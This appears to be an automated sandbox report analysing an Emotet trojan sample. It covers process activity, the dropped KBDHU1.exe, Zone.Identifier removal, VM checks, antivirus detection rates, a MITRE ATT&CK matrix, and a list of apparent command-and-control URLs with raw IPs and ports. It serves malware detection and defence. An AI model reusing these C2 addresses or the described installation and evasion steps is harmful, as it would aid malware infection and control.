Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02346530	5_2_02346530
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02343F20	5_2_02343F20
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02343D10	5_2_02343D10
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02341C70	5_2_02341C70
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02347740	5_2_02347740
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02343BA0	5_2_02343BA0

Source: boI88C399w.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: boI88C399w.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: boI88C399w.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: boI88C399w.exe, 00000000.00000002.665279497.00000000039C0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs boI88C399w.exe
Source: boI88C399w.exe, 00000000.00000002.665566623.0000000003AC0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs boI88C399w.exe
Source: boI88C399w.exe, 00000000.00000002.665566623.0000000003AC0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs boI88C399w.exe
Source: boI88C399w.exe, 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSEKPaint2.exe vs boI88C399w.exe
Source: boI88C399w.exe	Binary or memory string: OriginalFilenameSEKPaint2.exe vs boI88C399w.exe

Source: boI88C399w.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: boI88C399w.exe	Binary or memory string: F*\AC:\sekpaint20\SEKPaint2.vbp
Source: boI88C399w.exe, 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp, KBDHU1.exe, 00000005.00000002.905733350.000000000046C000.00000004.00020000.sdmp	Binary or memory string: @*\AC:\sekpaint20\SEKPaint2.vbp

Source: classification engine

Classification label: mal88.troj.evad.winEXE@9/0@0/100

Source: C:\Users\user\Desktop\boI88C399w.exe

Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,

0_2_02CC87D0

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe

Code function: 5_2_02344CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,

5_2_02344CB0

Source: C:\Users\user\Desktop\boI88C399w.exe

Code function: 0_2_02CC5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_02CC5070

Source: boI88C399w.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\boI88C399w.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: boI88C399w.exe	Virustotal: Detection: 81%
Source: boI88C399w.exe	Metadefender: Detection: 71%
Source: boI88C399w.exe	ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Users\user\Desktop\boI88C399w.exe 'C:\Users\user\Desktop\boI88C399w.exe'
Source: C:\Users\user\Desktop\boI88C399w.exe	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\boI88C399w.exe	Process created: C:\Windows\SysWOW64\mos\KBDHU1.exe C:\Windows\SysWOW64\mos\KBDHU1.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\boI88C399w.exe	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process created: C:\Windows\SysWOW64\mos\KBDHU1.exe C:\Windows\SysWOW64\mos\KBDHU1.exe	Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: boI88C399w.exe

Static PE information: real checksum: 0x8839b should be: 0x8f92d

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_0040C8B4 push es; retf	0_2_0040C8D3
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_0040C915 push ds; iretd	0_2_0040C91F
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5EF0 push ecx; mov dword ptr [esp], 0000669Ch	0_2_02CC5EF1
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5EA0 push ecx; mov dword ptr [esp], 0000A3FDh	0_2_02CC5EA1
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5E10 push ecx; mov dword ptr [esp], 0000F5B3h	0_2_02CC5E11
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5F20 push ecx; mov dword ptr [esp], 0000E36Ch	0_2_02CC5F21
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5CD0 push ecx; mov dword ptr [esp], 00001CE1h	0_2_02CC5CD1
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5DC0 push ecx; mov dword ptr [esp], 000089FAh	0_2_02CC5DC1
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5DF0 push ecx; mov dword ptr [esp], 0000AAF5h	0_2_02CC5DF1
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5D90 push ecx; mov dword ptr [esp], 0000B2E0h	0_2_02CC5D91
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5D50 push ecx; mov dword ptr [esp], 00006847h	0_2_02CC5D51
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5D00 push ecx; mov dword ptr [esp], 00001F9Eh	0_2_02CC5D01
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC5D20 push ecx; mov dword ptr [esp], 0000C5A1h	0_2_02CC5D21
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345D20 push ecx; mov dword ptr [esp], 0000C5A1h	5_2_02345D21
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345F20 push ecx; mov dword ptr [esp], 0000E36Ch	5_2_02345F21
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345E10 push ecx; mov dword ptr [esp], 0000F5B3h	5_2_02345E11
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345D00 push ecx; mov dword ptr [esp], 00001F9Eh	5_2_02345D01
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345D50 push ecx; mov dword ptr [esp], 00006847h	5_2_02345D51
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345EA0 push ecx; mov dword ptr [esp], 0000A3FDh	5_2_02345EA1
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345D90 push ecx; mov dword ptr [esp], 0000B2E0h	5_2_02345D91
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345DF0 push ecx; mov dword ptr [esp], 0000AAF5h	5_2_02345DF1
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345EF0 push ecx; mov dword ptr [esp], 0000669Ch	5_2_02345EF1
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345CD0 push ecx; mov dword ptr [esp], 00001CE1h	5_2_02345CD1
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02345DC0 push ecx; mov dword ptr [esp], 000089FAh	5_2_02345DC1

Source: initial sample

Static PE information: section name: .text entropy: 6.95649403306

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\boI88C399w.exe

Executable created and started: C:\Windows\SysWOW64\mos\KBDHU1.exe

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

PE file moved: C:\Windows\SysWOW64\mos\KBDHU1.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\boI88C399w.exe

File opened: C:\Windows\SysWOW64\mos\KBDHU1.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\splwow64.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\boI88C399w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_02CC5070

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 1024

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

API coverage: 8.1 %

Source: C:\Windows\System32\svchost.exe TID: 6088

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\boI88C399w.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,		0_2_02CC38F0
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_023438F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,		5_2_023438F0

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: svchost.exe, 00000006.00000002.692373036.000001D6AEA70000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.717376150.000001CEA4740000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.733356581.000001DC4FD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.765622331.00000270E7200000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: KBDHU1.exe, 00000005.00000003.819264277.000000000073D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWh*;
Source: svchost.exe, 0000000B.00000002.764772579.00000270E64F6000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.764648647.00000270E6470000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.692373036.000001D6AEA70000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.717376150.000001CEA4740000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.733356581.000001DC4FD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.765622331.00000270E7200000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.692373036.000001D6AEA70000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.717376150.000001CEA4740000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.733356581.000001DC4FD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.765622331.00000270E7200000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: KBDHU1.exe, 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWB
Source: svchost.exe, 00000006.00000002.692373036.000001D6AEA70000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.717376150.000001CEA4740000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.733356581.000001DC4FD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.765622331.00000270E7200000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC4E20 mov eax, dword ptr fs:[00000030h]	0_2_02CC4E20
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC3F20 mov eax, dword ptr fs:[00000030h]	0_2_02CC3F20
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02343F20 mov eax, dword ptr fs:[00000030h]	5_2_02343F20
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02344E20 mov eax, dword ptr fs:[00000030h]	5_2_02344E20

Source: C:\Users\user\Desktop\boI88C399w.exe

Code function: 0_2_02CC7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle,

0_2_02CC7EC0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: KBDHU1.exe, 00000005.00000002.905986603.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: KBDHU1.exe, 00000005.00000002.905986603.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: KBDHU1.exe, 00000005.00000002.905986603.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: KBDHU1.exe, 00000005.00000002.905986603.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\boI88C399w.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

Code function: 0_2_02CC7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle,

0_2_02CC7EC0

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe

Code function: 5_2_02345360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,

5_2_02345360

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.716674491.00000000032E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.658508716.0000000000602000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.661246086.0000000000602000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.boI88C399w.exe.62a3d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.62a3d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.2cc0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.KBDHU1.exe.32e32a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.62a3d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.32e32a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.KBDHU1.exe.32e32a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.2340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.32e32a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.boI88C399w.exe.62a3d0.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Service Execution1	Windows Service2	Windows Service2	Masquerading12	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel22	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection2	Virtualization/Sandbox Evasion21	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Hidden Files and Directories1	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Process Discovery3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	System Service Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	File and Directory Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Information Discovery15	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
boI88C399w.exe	82%	Virustotal		Browse
boI88C399w.exe	71%	Metadefender		Browse
boI88C399w.exe	90%	ReversingLabs	Win32.Trojan.Emotet
boI88C399w.exe	100%	Avira	TR/AD.Emotet.fkb
boI88C399w.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.3.boI88C399w.exe.62a3d0.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.boI88C399w.exe.62a3d0.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.boI88C399w.exe.2cc0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.3.KBDHU1.exe.32e32a0.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.KBDHU1.exe.2340000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.KBDHU1.exe.32e32a0.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//	0%	Avira URL Cloud	safe
http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/&	0%	Avira URL Cloud	safe
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/750%	0%	Avira URL Cloud	safe
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/x	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/s	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/v5s%	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/6	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/v	0%	Avira URL Cloud	safe
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//tItqVujt/djBiHrQbZlsTCQpMosu/bqx	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/K	0%	Avira URL Cloud	safe
http://www.microsoft.	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/	0%	Avira URL Cloud	safe
http://107.170.146.252:8080/yYXdTFdZ0/DfPFFYTbrJqLTvn/OUI1VCQMV00VFH/tItqVujt/djBiHrQbZlsTCQpMosu/bq	0%	Avira URL Cloud	safe
http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/V	0%	Avira URL Cloud	safe
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/A:	0%	Avira URL Cloud	safe
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/)5Z%	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/R	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/	0%	Avira URL Cloud	safe
